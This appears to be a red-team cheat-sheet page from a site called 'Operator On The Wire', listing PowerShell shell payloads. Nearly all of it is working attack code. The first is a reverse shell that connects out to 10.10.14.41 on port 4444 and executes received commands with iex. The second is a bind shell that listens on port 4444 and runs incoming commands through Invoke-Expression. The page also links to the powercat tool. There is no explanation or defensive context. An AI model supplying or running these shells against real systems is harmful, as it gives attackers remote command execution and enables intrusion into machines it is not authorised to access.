Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SHELLS / PAYLOADS

POWERSHELL

Revshell

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.41',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()};
$client.Close()

https://github.com/besimorhino/powercat

Bind Shell - Internal All The Things

Bind Shell

$listener = [System.Net.Sockets.TcpListener]4444
$listener.Start()
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$writer.AutoFlush = $true
while ($true) {
   $data = New-Object System.Byte[] 1024
   $bytesRead = $stream.Read($data, 0, $data.Length)
   if ($bytesRead -le 0) { break }
   $command = ([System.Text.Encoding]::ASCII).GetString($data, 0, $bytesRead)
   try {
       $output = Invoke-Expression -Command $command 2>&1 | Out-String
   } catch {
       $output = $_.Exception.Message
   }
   $writer.WriteLine($output)
}